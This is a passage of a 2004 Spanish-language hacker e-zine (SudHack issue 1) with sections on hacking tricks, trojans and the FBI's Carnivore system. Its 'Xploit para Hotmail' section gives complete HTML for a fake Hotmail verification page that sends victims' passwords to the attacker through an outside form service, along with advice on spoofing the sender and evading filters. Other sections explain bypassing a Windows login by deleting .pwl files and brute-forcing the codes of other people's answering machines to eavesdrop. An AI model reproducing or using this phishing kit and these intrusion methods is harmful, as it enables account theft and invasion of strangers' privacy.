
                                                                                 1/1/2004
 
*****************************************************************************************

                                 ###  # #  ##   # #  ###  ### #  #  
                                #    # #  # #  # #  # #  #   # #      
                               ###  # #  # #  ###  ###  #   ##      
                                #  # #  # #  # #  # #  #   # #     
                             ###  ###  ##   # #  # #  ### #  #  Zine 
                                                 Tu comunidad Habla Hispana de Hackers
*****************************************************************************************

 NOTA: SudHack, NI NINGUNO DE SUS REPRESENTANTES, PARTICIPANTES NI ESCRITORES, SE HACEN
 RESPONSABLES DEL MAL USO QUE SE LE PUEDA DAR A LA INFORMACIÓN PUBLICADA EN ESTE E-ZINE
 TODOS LOS DOCUMENTOS SON DE INFORMACIÓN Y NO PARA OCASIONAR DAÑOS.
*****************************************************************************************

Web oficial:
¯¯¯¯¯¯¯¯¯¯¯        http://www.SudHack.cjb.net
Web de la revista:
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯  http://www.SudHack-zine.cjb.net
Mail oficial de colaboradores:
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
                    sudhack@sudhack.zzn.com
el-guru                   >>el-guru@sudhack.zzn.com
rocko                     >>rocko@sudhack.zzn.com
AliretH_K                 >>alk@sudhack.zzn.com
Keogh                     >>keogh@novahack.com

Mail de la revista:
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ e-zine@sudhack.zzn.com
Foro oficial:
¯¯¯¯¯¯¯¯¯¯¯¯       http://sudhack.foro.st 




NOTA 2.
¯¯¯¯¯¯
      Como esta comunidad se encuentra representada por personas de distintas partes del mundo
me he tomado el atrevimiento de modificar algunos de los textos, para que puedan ser entendidos
por personas de cualquier parte del mundo. Lo modificado serán algunos términos y no la idea
del texto, o la idea en si.
Esta e-zine cuenta con millones de faltas de ortografía :D que se van a ir reduciendo a medida
que la e-zine toma mas profesionalidad XD.



	               			<----------->
			               	   INDICE
		               		<----------->



01>> EDITORIAL 		                      ->>>>>>>>>>>>>>>>>>>>>>>>>>>          BY SudHack

02>> RECOMENDADOS                             ->>>>>>>>>>>>>>>>>>>>>>>>>>>          BY SudHack

03>> ORGANIZACIÓN DE SudHack                  ->>>>>>>>>>>>>>>>>>>>>>>>>>>          BY SudHack

04>> TRUCOS HACK                              ->>>>>>>>>>>>>>>>>>>>>>>>>>>          BY AliretH_K
		
05>> PINCHANDO MÁQUINAS CONTESTADORAS         ->>>>>>>>>>>>>>>>>>>>>>>>>>>          BY DonGatø 	

06>> CREAR UN CD CON AUTORUN COMO PROFECIONAL ->>>>>>>>>>>>>>>>>>>>>>>>>>>          BY el-guru

07>> XPLOIT PARA HOTMAIL                      ->>>>>>>>>>>>>>>>>>>>>>>>>>>          BY AliretH_K

08>> TROYANOS A FONDO                         ->>>>>>>>>>>>>>>>>>>>>>>>>>>          BY el-guru 

09>> CARNIVORE			                ->>>>>>>>>>>>>>>>>>>>>>>>>>>          BY el-guru	

10>> INTRO AL HACK                            ->>>>>>>>>>>>>>>>>>>>>>>>>>>          BY Keogh
			 
11>> ESCUCHAS CON MOTOROLA                    ->>>>>>>>>>>>>>>>>>>>>>>>>>>          BY DonGatø 	
	
12>> NETBIOS                                  ->>>>>>>>>>>>>>>>>>>>>>>>>>>          BY BattleKat     

13>> BIOGRAFIA                                ->>>>>>>>>>>>>>>>>>>>>>>>>>>          BY _^SIAKO^_

14>> AGRADECIMIENTOS                          ->>>>>>>>>>>>>>>>>>>>>>>>>>>          BY SudHack

15>> DESPEDIDA                                ->>>>>>>>>>>>>>>>>>>>>>>>>>>          BY SudHack
	 
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



***********************
-----------------------
EDITORIAL
-----------------------
                   SudHack
***********************

Holaaaaa hackers del mundooooo!!!!, quiero darles la bienvenida al primer número de 
SudHack-Zine, también quiero dar las gracias a todos los "hackers" que han colaborado para que 
esta e-zine pueda llevarse a cabo.
Espero que todos los lectores de esta e-zine, tengan ganas de colaborar con ella, y manden 
sus textos a e-zine@sudhack.zzn.com que nosotros los leeremos y los editaremos en esta e-zine.

En este año la comunidad, ha cambiado mucho, hay normas que hay que cumplir, para que la 
comunidad sea mejor, por supuesto que esta abierta la comunidad para cualquiera que 
quiera participar en ella.

Trataremos temas relacionados con lo underground, Internet y/o computación, eso no quita 
que el día de mañana, si existe alguna noticia con suficiente índole como para publicarla, 
no vallamos a hacerlo.

También quiero aclarar que en esta parte de "Editorial" aclararemos algunos puntos, algunas 
dudas, pero no grandes. Por Ej: Han preguntado ¿Para que le ponen pass al foro, si total 
ustedes la andan diciendo por todos lados? - Bueno, verdaderamente, nosotros le ponemos pass al 
foro, para que no entre cualquier "XXXXXXX" y publique cualquier cosa, si bien cualquiera puede
adquirir la pass del foro, digamos que hay que estar un poquito en el tema.

No se sabe que secciones quedan y cuales no, no se sabe que va a pasar con todo eso, tengan
en cuenta que es el primer número, tal vez para la próxima, cambiamos algo, o tal vez
simplemente no estemos :P
 
Trataremos de no pasar temas viejos, aunque si hay un tema que se pida, lo editaremos, también
recuerda que si existe un tema viejo, pero ha sido historia, del tipo bug del Netbios, no 
podemos dejar de pasarlo. (o como el phf)

Bueno.... no se que mas.... la e-zine será bimestral o sea, saldrá cada dos meses, o sea que 
cada dos meses entras a la parte de e-zine y allí te la bajas.
Trataremos de que no se produzcan alteraciones de edición, o sea que no se editen mas tarde
de lo que tendría que ser, pero no queremos bajar la calidad de la revista, así que si tarda
unos días mas, por favor sepan disculparnos.

Bueno, creo que por el momento, no hay mas nada para decir, asi que basta de bla... bla... 
bla... y empecemos con el PRIMER NUMERO DE SudHack-Zine.


***********************
-----------------------
RECOMENDADOS
-----------------------
                  SudHack
***********************


<http://SUDHACK.CJB.NET <-> :p

<http://www.amd-hack.com.ar>

<http://www.novahack.com>	

<http://www.hispabyte.com>

<http://www.reparomipc.com> (Me ayudó en mis inicios con mi otra web) 

<http://www.hackersdelocos.com.ar>


Los provistos con anterioridad son algunos de los mejores sitios underground que se encuentran
en la red.
Y los que mejor que caen, los que me caen mal, mejor no ponerlos... jajaj



***********************
-----------------------
ORGANIZACIÓN DE SudHack
-----------------------
                  SudHack
***********************

Bueno, quiero que sepan que esta comunidad no es como cualquier otra ;) digamos que vendría a 
ser una comunidad con mas libertad que otras, además tiene una organización diferente de como 
manejarse.
Esta lo que llamamos la "index" que es la web, en donde se encuentra las banderas para ingresar
a los distintos países, entonces, nosotros, vamos consiguiendo webmasters para los demás 
países, cada uno de ellos debe realizar una web, representando a su país y luego nosotros nos 
encargamos de que la bandera de su país se encuentre en la index, pero obviamente, nos tienes 
que avisar que quieres participar con nosotros, antes de empezar a trabajar, nosotros te 
haremos algunas preguntas y te daremos alguna pautas. ;) 
Si tu país ya tiene representante, puede colaborar con el, luego ustedes ven como se organizan,
alguno hace una parte, el otro otra, o organícense como quieran.
Al contactarte con nosotros, y en el momento en que tu decides que quieres colaborar con 
nosotros, nosotros te mandamos una seria de "normas" que debes de seguir para poder participar 
mas a fondo en SudHack (mas a fondo me refiero en las web´s, no en el foro o en la zine)
Luego, mientras mas te "metas" en la comunidad, vas a recibir un pequeño "programita" de 
SudHack (no lo tiene nadie mas que SudHack) que es para encriptar mensajes, muy util.
Pero, no lo vas a recibir en seguida, ten en cuenta, que si te quedas con el programa, tu puedes
desencriptar todos nuestras conversaciones.




***********************
-----------------------
TRUCOS HACK
-----------------------
                  AliretH_K
***********************

En esta sección mostrare algunos trucos que todo hacker tiene que saber, no importa que tan 
viejos sean, pero los tienes que saber si o si, por ej. ahora vamos a ver como saltear la pass
de win, pero tal vez la próxima veamos el bug del phf, o sea no importa que tan viejo sea, lo
importante es que lo tienes que saber.
A pesar de que me encante escribir documentos no creo que tengan muchos escritos por mi, ya que
tengo que hacer otro tipo de cosas relacionadas con SudHack y tambien tengo que estudiar
por que casi repito de año :p y mi vieja me cago a pedos, pero tratare de hacer lo que pueda.
Tampoco sabemos cuanto va a durar esta sección ;) jejej 
Lo que vamos a ver ahora es realmente fácil, pero cuando le dices a un amigo que te puedes 
saltar la pass de win, se queda boquiabierto :)
La pass de win se guarda con la extensión .pwl, y generalmente se encuentra en c:/windows
Pero si la eliminas win, no encuentra el pass al entrar, entonces tienes que crear una ;)
Bueno, este no es el tema, vamos a ver como entrar, luego adentro de win, tu ya sabes lo demás.

....

                                  ..::PASSWORD DE WINDOWS::..

Encendemos la PC, esta arrancando todo...
Antes de que salga la ventana para colocar la pass, o sea, cuado se esta ejecutando todo.
Pulsa F8, entraras a un menú de win  elige "modo a prueba de fallos"
Y estarás dentro de win, sin haber colocado ninguna pass, 
¿¿¿¡¡¡Qué pasa acá!!!???
Tu has entrado a windows, pero no has dejado que se ejecutaran los drivers de la pc, entonces 
estarás dentro, pero tendrás algunas restricciones, no podrás ejecutar programas, ni demás cosas
eso no importa, desde allí tienes suficientes cosas como para poder hacer lo que quieras 
dentro de la pc, desde allí, puedes cambiarle la pass a la computadora.
Luego de ahí, ya puedes hacer distintas cosas, puedes borrar los .pwl y al reiniciar pondrás
la pass que tu quieras o cambiarla directamente cuando ya estas dentro, lo importante es que
ya conseguiste entrar en el sistema y tienes las suficientes armas para no dejar que nadie mas 
lo haga. ;)

                                  

                                                                                  
***********************
-----------------------
PINCHANDO MÁQUINAS CONTESTADORAS
-----------------------
                  DonGatø
***********************

Pinchando maquinas contestadoras

Buenas, para variar un poquito de phreak : )
En esta nota intentare mostrarles como se hace para pinchar una contestadora telefónica comun 
y corriente como la que tiene cualquiera, todas las contestadoras telefónicas tienen una 
función que viene de fabrica pero que nadie sabe porque nadie lee un manual de nada, esta 
función permite a cualquier persona que sepa el código escuchar las llamadas grabadas, 
borrarlas y demás cosas interesantes, lo único que hay que hace es esperar que la contestadora
este hablando, antes de que escuche el pitido (o como mierda le quieras decir) debes 
poner # o *, depende del aparato que sea y un numero, como es obvio a medida que las 
contestadoras fueron evolucionando los numero fueron cada vez mas grandes, pero prueba 
con # y numero de 2 dígitos, que por lo general de fabrica son fáciles como 00 11 22 y así, 
si le pegas (que no es tan difícil, yo he encontrado algunas) podrás escuchar los mensajes, 
borrarlos, y hasta escuchar con el altavoz que tiene la maquina lo que pasa dentro de la casa, 
es bastante entretenido :)

Aparte de esto, investigando encontré una nota anónima que da una lista, que reproducirse 
textualmente por los derechos de autor ¿?

"Los contestadores con una clave de dos cifras te dan seis pulsaciones de teclas antes de 
bloquearse y colgarte. Aquí es donde radica la utilidad de la tabla....
Al meter los seis números, por ejemplo: 123456, el contestador identifica los siguientes 
pares de números: 12, 34, 56, que son los evidentes, pero también estos: 23, 45.
Así es como funciona la tabla. Con 20 llamadas y 6 números cada vez, has barrido los 100 
posibles números. Necesitarías 34 llamadas, pero ahora solo necesitas 20 en el peor de los 
casos.
En la práctica, hemos podido encontrar claves en 7 llamadas.
No, si me parece de pm, pero donde esta la tabla??
Pues esta es....


900102
353637
738394
445464
474849
955657
758596
667686
697787
050607
293343
617181
203040
627282
242526
192232
141516
112131
798899
708091

Cada grupo de 6 cifras son los 6 números que debes marcar cada vez que llamas al contestador 
y le das al * Así, los 20 grupos simbolizan las 20 llamadas que debes hacer, como mucho, 
para encontrar la clave.
Bueno, tampoco lo he dicho antes, pero todo esto lo debes hacer desde un teléfono de tonos.
En caso de que no encuentres la clave tras marcar los veinte números, pues es que la 
clave es de 3 o mas cifras, así que solo puedes hacer dos cosas, o pruebas los números de 3 
cifras que se te ocurran, o pruebas todos, o te vas a por otro contestador, porque hay mas 
de los que te pudieras pensar.... "


Saludos y hasta la próxima




***********************
-----------------------
CREAR UN CD CON AUTORUN COMO PROFECIONAL
-----------------------
                  el-guru
***********************

 Pues bien estos archivos de Autorun es para la función de AutoPlay, si 
 quieres saber mas... sigue abajo...


 Primero tienes que crear un archivo llamado Autorun.inf que habrá que 
 insertar en el directorio raíz del CD.

 En este archivo se creara una sección, al estilo de los archivos 
 INIs, llamada [autorun], bajo esta sección se incluirá el icono a 
 mostrar y el ejecutable a usar; para el ejecutable se usa OPEN= 
 y para el icono se usa ICON= (algo parecido a la programación del mIRC)
 aquí tienes un ejemplo:

 [autorun]
 OPEN=programa_de_inicio.exe
 ICON=guru.ICO

 Si en lugar de un ejecutable quieres usar una pagina HTML tendrás 
 que usar el Explorador de Windows para que lo abra, ya que no sirve 
 insertar el nombre de la pagina sin mas, por ejemplo:

 [autorun]
 OPEN=C:\WINDOWS\explorer.exe website.html ó puede ser .htm
 ICON=guru.ICO

 Por supuesto tanto el icono como el ejecutable o pagina a usar pueden 
 estar en un directorio del CD, si lo haces así, tendrás que incluir el 
 path en el fichero autorun.inf.




***********************
-----------------------
XPLOIT PARA HOTMAIL
-----------------------
                  AliretH_K
***********************


Llamaremos xploit, ha hacer creer a una persona, que un mensaje, correo, web, o lo que sea, es
de un destinatario específico, haciendole ingresar datos importantes, que luego seran enviados
(sin que la víctima sepa) a nuestro correo.
En este texto veremos como realizar un xploit para hackear una cuenta de hotmail.
Entonces:
Crearemos un codigo html, para hacer creer que somos de hotmail
Falsificaremos una cuenta de hotmail
Enviaremos en mail
Luego nos quedamos con la password

------------CODIGO----------------

<html> 
<head> 
<meta name="xploit para Hotmail o Msn" content="xploit"> 
<title>Hotmail.com - Confirmacion De Usuarios</title> 


<link 
href="http://64.4.18.24/Hotmai_archivos/hotmail___7.css" rel=stylesheet> 
</head> 
<body bgcolor="#FFFFFF" topMargin="0"> 

<center><table BORDER=0 CELLSPACING=2 CELLPADDING=0 WIDTH="590" > 
<tr> 
<td COLSPAN="2"> 
<table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" > 
<tr> 
<td><a href="http://lc2.law13.hotmail.passport.com/cgi-bin/login?_lang=ES" target="_top">
<font face="Verdana" size="2"><img SRC="http://64.4.18.24/logo_msnhmr_468x60.gif" NOSAVE 
BORDER=0 height=60 
width=468></font></a></td> 

<td ALIGN=CENTER NOWRAP><font face="Verdana" size="2"><img SRC="http://64.4.18.24/logo_
passport_140x44.gif" 
ALT="Descubra más acerca de Passport" NOSAVE BORDER=0 height=44 width=140> 
<br><a href="http://nexusrdr.passport.com/redir.asp?_lang=ES&pm=id%3d2%26fs%3d1%26cb%3d_
lang%253dES%26ct%3
d1018127971&attrib=Help" target="_top">Ayuda</a></font></td> 
</tr> 
</table> 
</td> 
</tr> 

<tr> 
<td BGCOLOR="#93BEE2" style="PADDING-RIGHT: 3px; PADDING-LEFT: 3px; PADDING-BOTTOM: 3px; 
PADDING-TOP: 3px">
<b><font face="Verdana" size="2">Confirmación 
de Usuarios</font></b></td> 

<td VALIGN=TOP></td> 
</tr> 

<tr> 
<td HEIGHT="6"></td> 
</tr> 

<tr VALIGN=TOP> 
<td><form method="post" action="http://www.melodysoft.com/cgi-bin/form.cgi"><input 
type="hidden" 
name="recipient" value="TUMAILACA"><input type="hidden" name="redirect" 
value="http://lc3.law13.hotmail.passport.com/cgi-bin/dasp/hminfo_shell.asp?_lang=
ES&content=whysign&us=ws&id=2&fs=1&cb=_lang%3dES&ct=1015737453"> 

<table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" > 
<tr> 
<td><font face="Verdana" size="2"><b>Usuario</b></font></td> 

<td><font face="Verdana" size="2"><input type="usuario" name="Usuario" size="20">@<select 
size="1" 
name="Server"> 
<option value="Hotmail.com">Hotmail.com</option> 
<option value="Msn.com">Msn.com</option> 
</select></font></td> 
</tr> 

<tr> 
<td><font face="Verdana" size="2"><b>Nombre</b></font></td> 

<td><font face="Verdana" size="2"><input name="Nombre" size="30"></font></td> 
</tr> 
<tr> 
<td><font face="Verdana" size="2"><b>Apellidos</b></font></td> 

<td><font face="Verdana" size="2"><input name="Apellido" size="30"></font></td> 
</tr> 
<tr> 
<td><font face="Verdana" size="2"><b>Contraseña</b></font></td> 

<td><font face="Verdana" size="2"><input type="password" name="cur_passwd" size="30"></font>
</td> 
</tr> 


<tr> 
<td></td> 

<td> 
<font face="Verdana" size="2"> 
<br><input type="submit" value="Aceptar"><input type="reset" value="Cancelar"></form></font>
</td> 
</tr> 
</table> 
</td> 

<td ROWSPAN="4"></td> 
</tr> 

<tr> 
<td>Devido a la gran demanda de usuarios que poseé la empresa de correo
  electrónico <b>HotMail</b> nos hemos visto a la necesidad de 
recorrer a nuestros usuarios para verificar si son usuarios activos.<br> 
<br> 
Como la empresa de correos, sabe que usted nuestro usuario Trabaja, Estudia, 
Viaja.&nbsp;<br>
 No le es posible checar este correo continuamente. por ello <b>Hotmail 
</b>les da de tolerancia dos semanas despues de haber sido enviado este mail. 
Si no su cuenta la tendremos que tener como usuario no activo y tendriamos que 
darle da baja a su cuanta de correo automaticamente<br> 
<br> 
<b>Hotmail </b>esta muy agradecido con usted por ser un usuario mas de 
nuestra empresa.<br> 
 </td> 
</tr> 
</table><table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="623" > 
<tr> 
<td width="621"> <font face="Verdana" size="2"> <br> 
© 2003 Microsoft Corporation.Reservados todos los derechos. 
<br><a href="http://g.msn.com/1HM506701/D" target="_top">CONDICIONES DE 
USO</a> <a href="http://g.msn.com/1HM506701/C" target="_top">Declaración 
de privacidad</a></font></td> 
</tr> 
</table></center> 

</body> 
</html> 

----------FIN DEL CODIGO-----------


Es algo obvio que donde dice TUMAILACA debes colocar tu correo electrónico, asi la pass llega 
a el.
Ya teniendo el código, debemos enviar el mail, podemos realizarlo de diferentes maneras, 
podemos mandarlo por telnet, pero no lo recomiendo, yo recomiendo mandar el codigo por 
UBI-ANONYMUS que es un programapara mandar correos anónimos, que realmente es excelente.
A la persona que le mandamos el mail, le hacemos creer que viene de algo como:
pass@hot.......
retrypass@hot.....
password@hot.....

Asi piensa que es directamente de hotmail.
Y si todo sale bien, la victima llenara todo los espacios y vos te quedaras con la pass.


NOTAS Y TRUCOS:

*Este codigo html es algo simple, pero para mostrar el ejemplo, lo podemos modificar totalmente
asi logramos algo mas realista y mas facil de que la persona caiga.

*Muchos dicen que hotmail ya no hacepta codigo html, y.... es verdad, pero pensando de que había
otra forma de insertar el codigo, yo mismo descubri una (en verdad no creo que halla sido yo
ya que es algo muy facil, pero busque y busque y nadie me sabia decir como hacerlo)
Cuando ponemos redactar y se carga la pagina, pulsamos detener, antes de que se cargue la barra
de herramientas del textarea, y copiamos el codigo html, esto lo que hace es no dejar que se 
cargue el codigo que prohibe el html, entonces cuando enviamos el mail, el html, lo lee sin 
problemas.
Esto sirve para engañar a un amigo, ya que no fasificaras una cuenta, si no que la enviaras de 
tu cuenta.

*No confundir exploit (que es un programa) con xploit (que es lo que vimos)

*Las cadenas del codigo estan cortadas asi pueden entrar en el .txt, pero vos te daras cuenta
de como unirlas.

*Hay muchas ideas para realizar el codigo, aparte de una confirmación de usuarios, podes 
invertar, que hotmail, perdio las contraseñas, o que hotmail te envia una posta y deves colocar
tu pass, pero tienes miles de ideas para hacerlo.


NOTA FINAL: Pido perdon, por que estos script, estan echos con los cgi de melodysoft, y esta 
empresa ya los dió de baja, por este mismo problema.
Pero no hay problema, create una cuenta en cualquier servicio que te de formularios, y luego
agregale el código en lugar de los cgi.


***********************
-----------------------
TROYANOS A FONDO
-----------------------
                  el-guru
***********************

Para aquellos que están entrando al mundo "Under" aquí les mostramos lo que
 es un caballo de Troya ó mejor llamado TROYANO.


 Que es un caballo de Troya?

 Los caballos de Troya, troyanos, se llaman así porque actúan del mismo modo
 en tu ordenador. Un caballo de Troya es un programa aparentemente útil,
 novedoso, o atractivo que contiene funciones ocultas que permiten, por
 ejemplo, obtener privilegios de usuario (siempre que el programa se ejecute),
 suponiendo un enorme problema de seguridad. Generalmente un caballo de Troya
 no tiene efecto sin la colaboración involuntaria del usuario a quien va
 dirigido.

 Como se hace eso?


• Porque un caballo de Troya se ha debido de obtener, por fuerza, de un
  origen dudoso o desconocido (aunque excepcionalmente se han dado casos
  de inserción de Troyanos en lugares de distribución de reconocido
  prestigio).


• El programa ha conseguido almacenarse en el sistema con la colaboración
   del usuario, con lo cual puede ejecutarse en cualquier momento, incluso
   mucho tiempo después de su entrada.

 Los caballos de Troya son normalmente instalados por los propios usuarios
 inadvertidamente o bien por intrusos que han obtenido acceso sin permiso al
 sistema a trabes de otros medios.

 Como se mete en mi PC? 

 Los atacantes utilizan métodos de distribución como los siguientes:


• Envío masivo de e-mails con un troyano adjunto. Recientemente se ha dado
   el caso de un e-mail, presuntamente enviado por Microsoft a sus usuarios,
   que invita a actualizar el navegador Microsoft Internet Explorer. Sin
   embargo Microsoft ha confirmado que no proporciona parches o
   actualizaciones a trabes de correo electrónico, aunque si distribuye de
   esta forma boletines periódicos de seguridad.

   Este mensaje contiene un programa ejecutable adjunto llamado Ie0199.exe.
   Tras su instalación, el programa origina bastantes modificaciones en el
   sistema e intenta contactar con otros sistemas remotos. Existen múltiples
   versiones de este caballo de Troya, por lo que las modificaciones no
   cumplen una norma generalizada.

   Una de estas versiones se acompaña del mensaje siguiente: 

   As an user of the Microsoft Internet Explorer, Microsoft Corporation
   provides you with this upgrade for your web browser. It will fix some bugs
   found in your Internet Explorer. To install the upgrade, please save the
   attached file (ie0199.exe) in some folder and run it.

   Por supuesto, no es un mensaje de Microsoft.


• Envío durante sesiones IRC. Se convence a un usuario no experimentado
   para que reciba un programa muy interesante. Dependiendo de los gustos
   del usuario, se renombra el troyano para que su ejecución sea segura.


• Distribución a trabes de Web, Newsgroups, FTP, etc... con las mismas
   técnicas de "venta", es decir, programa novedoso, interesante, de gran
   utilidad...


• Inserción del Troyano en programas de gran demanda, modificando su
   instalación pero manteniendo intacto el programa original, sin que el
   usuario aprecie ningún cambio o indicios sospechosos en su funcionamiento.


• Modificación de programas en lugares de distribución de reconocido
   prestigio, lo cual supone una entrada no autorizada en dichos sistemas
   e implica un alto grado de infección incluso en maquinas de usuarios
   experimentados y precavidos.


• Infección a trabes de applets Java, Javascript, Active X... 


• Cualquier otra técnica de ingeniería social, incluso envío de Cds o de
   cualquier otro soporte de almacenamiento por correo tradicional, simulando
   regalos, anuncios, promociones, etc.


 Así que mejor ten cuidado con lo que utilizas... siempre tienes que estar
 convencido de que el Software que bajas de Internet esta limpio




***********************
-----------------------
CARNIVORE
-----------------------
                  el-guru
***********************


Este artículo que escribiré es del CARNIVORE para que sepan un poquito mas
 de seguridad y que sepan con que nos VIGILAN LOS OJETES ESTOS...

 Probablemente muchos de ustedes ya han oído hablar de Carnivore.
 Este es un programa hecho por el FBI para dar a esta agencia el acceso de
 monitorear a gente sospechosa por internet, es decir rastrear personas que andan
 hackeando páginas.

 Pero antes vamos al los padres y antepasados del Carnivore:

• Omnivore fue desechado en 1999 y fue reemplazado por DragonWare Suite
  donde este contiene tres partes: 


• Carnivore- un programa para windows NT/2000 que caputra 
             informacion. 

• Packeteer- la información de este programa no ha sido revelada por 
             el FBI pero supuestamente es una aplicación que compara 
             paquetes con mensajes o paginas web

• Coolminer- la información de este programa no ha sido revelada 
             por el FBI pero se cree que es una aplicación para 
             analizar datos que se encuentran en los mensajes.

 DragonWare Suite no es una tecnología nueva como muchos lo piensan. Carnivore 
 es un sistema muy controversial y aquí explicaremos  el proceso que el 
 FBI sigue para utilizar este sistema.  
  
 Primero el FBI tiene que tener una sospecha de que alguien este involucrado 
 en fraude electrónico. Después tienen que conseguir un permiso de la 
 corte de EU para que tengan derecho de monitorear toda la información 
 que sea necesaria del sospechoso.  Luego contactan al ISP y les piden 
 una copia de los archivos del sospechoso (si es que el isp los tiene). 
 
 El FBI luego se mete al ISP e instala Carnivore en una computadora aparte.  
 La computadora tiene las siguientes características:

• Pentium III, 128Mb RAM, Windows NT/2000
• Una applicación comercial de comunicaciones
• Una aplicación creada en c++ que trabaja en conjunto con lo mencionado arriba 
  para lo que es el sniffing y el filtering
• Una llave fisica para accesar la computadora que contiene carnivore en el ISP.
• Un sistema para aislar la computadora de la red y que se vea invisible, de esta 
  forma no puede ser accesada remotamente o comprometida.
• Un Jaz drive en el que se puede meter 2gb en una sola unidad, esto es para 
  guardar los paquetes caputrados del sospechoso.

 Despues el FBI configura Carnivore con la direccion ip de el sospechoso para
 que nadamas capture paquetes de el sospechoso e ignore los demas.  Luego 
 Carnivore copia todos los archivos del sospechoso sin impedir el trafico de 
 la red. Despues el programa usa un filtro para clasificar los paquetes 
 recibidos. De esta manera por el protocolo el programa pone en orden los 
 paquetes de email, los de la web etc...  Despues estos paquetes son guardados 
 al cartucho jaz. Luego cada dia o dos un agente del FBI saca el cartucho lo 
 cambia por uno nuevo, agarra el cartucho usado le pone la fecha y lo sella en 
 una caja.  Si el sello se abre la persona que lo abrio debe de ponerle fecha otra 
 vez y firmarlo de lo contrario el cartucho ya no se considera evidencia imporante.  
 El FBI debe de irse en un mes a menos de que la corte apruebe mas tiempo.  El 
 FBI desarma el sistema y se va del ISP, despues usan Coolminer para checar lo 
 que tienen los cartuchos. Despues el FBI tiene permiso de utilizar lo encontrado 
 en la corte.

 El FBI utiliza Carnivore para differentes casos por ejemplo, terrorismo, 
 espionaje, fraude, informacion de guerra, o pornografia infantil.  Este sistema 
 es controversial ya que muchos piensan incluyendome que esto es una violacion de 
 la privacia.  Si Carnivore se usa sin permiso de la corte entonces esto es  
 ilegal y la idea de que alguien pueda revisar lo que haces sin que lo sepas es 
 horrible.  Hay rumores que dicen que Carnivore es un sistema que regula toda la 
 internet y ve todo lo que todos hacen pero para hacer eso el FBI tendria que 
 meter sus sistemas en todos los servidores incluyendo privados comerciales y 
 educacionales y digamos que esto lo logran hacer, es imposible que lo hagan en 
 todo el mundo ya que si se meten a otro pais ya se meterian en problemas.  
 Tambien hay rumores de que el sistema busca palabras como "bomba" o "asesinato" 
 esto es negado por el FBI ya que viola los derechos establecidos en la 
 constitucion de EU.  Este sistema mencionado se dice llamar Echelon y 
 supuestamente se rumora que fue creado por la NSA (Nacional Security Agency) 
 no hay evidencia solida de que esto exista.  Mucho confunden Echelon con 
 Carnivore pero son dos cosas diferentes.  

 Muchos se han preguntado esto. Que impide al FBI ver mas cosas de las que deben
 ver? Por lo general el FBI nadamas es otorgado monitorear el puerto 25 que es de 
 email y a veces otros puertos por si el sospechoso usa hotmail.  En pocas ocaciones
 se le otorga al FBI derecho de ver mas cosas como las paginas que navegas o algun
 otro puerto que utilizas.  Otra cosa muy importante es el hecho de que ya instalado
 el sistema Carnivore en el ISP el FBI puede ver toda la subred.  Que impide a los 
 agentes ver algo que no deben.  Si pueden ver toda la subred de la isp entonces 
 pueden ver a todos.

 Hay varias formas de solucionar el problema para que el FBI no pueda utilizar Carnivore
 Primero que nada yo recomiendo fuertemente que encripten todo lo que mandan por email
 y de esta forma previenes que puedan ver los datos. 

CONSEJO PA JAIKERS: (siempre me da risa esa palabra... Jaikers que me recuerda un taquero)
 Esta forma puede que funcione pero es tambien probable que puedan ver tu private 
 key y no te sirva de nada asi que tambien ten conecciones SSH a sistemas remotos
 que corran sendmail o utiliza conexiones encriptadas dedicadas de dial-up y otras
 soluciones VPN tambien pueden funcionar. 
  
 El FBI se ha negado en dar el codigo fuente de Carnivore y dicen que no violan 
 ningun acuerdo con la consitucion.

 Así que cuidadito con andar HACKEANDO webs caones!!!

 SALU2 el-guru	 


***********************
-----------------------
INTRO AL HACK
-----------------------
                  Keogh
***********************

Bueno pues esto es una recopilacion de textos por la red, y cosas que yo mismo describo, espero
y les guste.

1. Introducción
Bueno, la definición típica del hacker es: "un aficionado a los ordenadores o computadoras, un 
usuario totalmente cautivado por la programación y la tecnología informática. En la década de 
1980, con la llegada de las computadoras personales, y posteriormente con la posibilidad de 
conexión a los grandes sistemas de ordenadores a través de Internet, este término adquirió una 
connotación peyorativa y comenzó a usarse para denominar a quien se conecta a una red para 
invadir en secreto computadoras, y consultar o alterar los programas o los datos almacenados 
en las mismas. También se utiliza para referirse a alguien que, además de programar, disfruta 
desensamblando sistemas operativos y programas para entender su lógica de funcionamiento".
Una buena definición acerca de lo que es un hacker, y además dice algo esencial, a un hacker 
se le denomina delicuente pero... veamos más.
El hacking es ampliamente considerado ilegal. El movimiento hacker es estigmado, desacreditado 
y perseguido por los medios de comunicación y la cultura corporativa como juvenil, 
trastornador, y criminal. Y todo el tiempo es generalmente mal interpretado.
"Los hackers son definidos como entusiastas de la informática que tienen un interés ardiente 
en aprender acerca de los sistemas y como usarlos de formas inovadoras". Esta definición, por 
tanto, no incluye a los hackers malignos que deliberadamente rompen sistemas y borran ficheros,
sino a esos hackers que exploran sistemas simplemente por el reto intelectual y que no dejan 
indicios de sus andaduras. Además, hay generalmente hay malos usos del término ya que en el 
underground informático no sólo está formado por hackers, sino también otras clases de 
entusiastas informáticos, por ejemplo, crackers, phreakers, piratas de software, etc. 
(y el público en general piensa que todos son hackers).
Si, hay "hackers" que destruyen ficheros y rompen sistemas, pero ciertamente no conforman la 
abrumadora mayoría de hackers, además no deben de ser llamados hackers, sino crackers. Muchos 
hackers, como su intención primaria, pasan completamente desapercibidos en los sistemas que 
eligen hackear y no son nunca descubiertos. El no dejar rastros o huellas es lo más importante 
de los hackers.
"Estamos sedientos de conocimientos e información, y ¿puedes entonces realmente pensar que 
vamos a destruir eso que es sagrado para nosotros? ¿Para quitarle la oportunidad a otro de 
tener éxito al entrar como nosotros lo hicimos? ¿para hechar más leña al fuego de una ya 
terrible reputación y aumentar las posibilidades de ser pillados y así efectivamente arruinar 
nuestras vidas y carreras?" [Toxic Shock: 1990]
El enemigo de los hackers son aquellos que tratan de oprimirles todo lo que pueden, el Estado 
y las grandes corporaciones. El hacking, como una forma de protesta socio-politica, es por 
tanto difamado y denunciado en los medios por estas instituciones. El hacking es un fenómeno 
